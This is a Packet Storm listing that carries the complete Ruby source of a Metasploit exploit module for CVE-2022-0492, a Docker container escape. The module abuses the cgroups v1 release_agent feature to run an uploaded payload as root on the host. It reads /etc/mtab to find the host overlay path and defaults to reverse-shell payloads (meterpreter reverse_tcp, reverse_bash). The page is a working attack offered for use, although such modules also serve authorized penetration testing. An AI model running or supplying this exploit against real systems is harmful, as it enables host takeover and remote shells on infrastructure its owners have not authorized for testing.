what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Docker cgroups Container Escape

Docker cgroups Container Escape
Posted Dec 7, 2023
Authored by h00die, Kevin Wang, T1erno, Yiqi Sun | Site metasploit.com

This Metasploit exploit module takes advantage of a Docker image which has either the privileged flag, or SYS_ADMIN Linux capability. If the host kernel is vulnerable, its possible to escape the Docker image and achieve root on the host operating system. A vulnerability was found in the Linux kernel's cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly.

tags | exploit, kernel, root
systems | linux
advisories | CVE-2022-0492
SHA-256 | f89ca645e9a7ab68a61d054b319e54c6af9a4e97faf0cab7987d8a5f919f6c11

Docker cgroups Container Escape

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html

include Msf::Post::Linux::Priv
include Msf::Post::Linux::Kernel
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Docker cgroups Container Escape',
'Description' => %q{
This exploit module takes advantage of a Docker image which has either the privileged flag, or SYS_ADMIN Linux capability.
If the host kernel is vulnerable, its possible to escape the Docker image and achieve root on the host operating system.

A vulnerability was found in the Linux kernel's cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function.
This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges
and bypass the namespace isolation unexpectedly.

More simply put, cgroups v1 has a feature called release_agent that runs a program when a process in the cgroup terminates.
If notify_on_release is enabled, the kernel runs the release_agent binary as root. By editing the release_agent file,
an attacker can execute their own binary with elevated privileges, taking control of the system. However, the release_agent
file is owned by root, so only a user with root access can modify it.
},
'License' => MSF_LICENSE,
'Author' => [
'h00die', # msf module
'Yiqi Sun', # discovery
'Kevin Wang', # discovery
'T1erno', # POC
],
'Platform' => [ 'unix', 'linux' ],
'SessionTypes' => ['meterpreter'],
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
},
'Privileged' => true,
'References' => [
[ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=24f6008564183aa120d07c03d9289519c2fe02af'],
[ 'URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'],
[ 'URL', 'https://github.com/T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC'],
[ 'URL', 'https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492'],
[ 'URL', 'https://github.com/SofianeHamlaoui/CVE-2022-0492-Checker/blob/main/escape-check.sh'],
[ 'URL', 'https://pwning.systems/posts/escaping-containers-for-fun/'],
[ 'URL', 'https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html'],
[ 'URL', 'https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation'],
[ 'URL', 'https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/'],
[ 'CVE', '2022-0492']
],
'DisclosureDate' => '2022-02-04',
'Targets' => [
['BINARY', { 'Arch' => [ARCH_X86, ARCH_X64], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } }],
['CMD', { 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } }]
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK]
}
)
)
register_advanced_options [
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]
end

def base_dir
datastore['WritableDir']
end

def check
print_status('Unable to determine host OS, this check method is unlikely to be accurate if the host isn\'t Ubuntu')
release = kernel_release
# https://people.canonical.com/~ubuntu-security/cve/2022/CVE-2022-0492
release_short = Rex::Version.new(release.split('-').first)
release_long = Rex::Version.new(release.split('-')[0..1].join('-'))
if release_short >= Rex::Version.new('5.13.0') && release_long < Rex::Version.new('5.13.0-37.42') || # Ubuntu 21.10
release_short >= Rex::Version.new('5.4.0') && release_long < Rex::Version.new('5.4.0-105.119') || # Ubuntu 20.04 LTS
release_short >= Rex::Version.new('4.15.0') && release_long < Rex::Version.new('4.15.0-173.182') || # Ubuntu 18.04 LTS
release_short >= Rex::Version.new('4.4.0') && release_long < Rex::Version.new('4.4.0-222.255') # Ubuntu 16.04 ESM
return CheckCode::Vulnerable("IF host OS is Ubuntu, kernel version #{release} is vulnerable")
end

CheckCode::Safe("Kernel version #{release} may not be vulnerable depending on the host OS")
end

def exploit
# Check if we're already root as its required
fail_with(Failure::NoAccess, 'The exploit needs a session as root (uid 0) inside the container') unless is_root?

# create mount
folder = rand_text_alphanumeric(5..10)
@mount_dir = "#{base_dir}/#{folder}"
register_dir_for_cleanup(@mount_dir)
vprint_status("Creating folder for mount: #{@mount_dir}")
mkdir(@mount_dir)
print_status('Mounting cgroup')
cmd_exec("mount -t cgroup -o rdma cgroup '#{@mount_dir}'")
group = rand_text_alphanumeric(5..10)
group_full_dir = "#{@mount_dir}/#{group}"
vprint_status("Creating folder in cgroup for exploitation: #{group_full_dir}")
mkdir(group_full_dir)

print_status("Enabling notify on release for group #{group}")
write_file("#{group_full_dir}/notify_on_release", '1')

print_status('Determining the host OS path for image')
# for this, we need the line that starts with overlay, and contains an 'upperdir' parameter, which we want the value of
mtab_file = read_file('/etc/mtab')
host_path = nil
mtab_file.each_line do |line|
next unless line.start_with?('overlay') && line.include?('perdir') # upperdir

line.split(',').each do |parameter|
next unless parameter.start_with?('upperdir')

parameter = parameter.split('=')
fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') unless parameter.length > 1
host_path = parameter[1]
end
break
end

fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') if host_path.nil? || host_path.empty? || host_path.start_with?('sed') # start_with catches repeat of command

vprint_status("Host OS path for image: #{host_path}")

payload_path = "#{base_dir}/#{rand_text_alphanumeric(5..10)}"
print_status("Setting release_agent path to: #{host_path}#{payload_path}")
write_file "#{@mount_dir}/release_agent", "#{host_path}#{payload_path}"

print_status("Uploading payload to #{payload_path}")
if target.name == 'CMD'
# for whatever reason it's unhappy and wont run without the /bin/sh header
upload_and_chmodx payload_path, "#!/bin/sh\n#{payload.encoded}\n"
elsif target.name == 'BINARY'
upload_and_chmodx payload_path, generate_payload_exe
end
register_files_for_cleanup(payload_path)

print_status("Triggering payload with command: sh -c \"echo \$\$ > #{group_full_dir}/cgroup.procs\"")
cmd_exec(%(sh -c "echo \$\$ > '#{group_full_dir}/cgroup.procs'"))
end

def cleanup
if @mount_dir
vprint_status("Cleanup: Unmounting #{@mount_dir}")
cmd_exec("umount '#{@mount_dir}'")
end
super
end
end
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close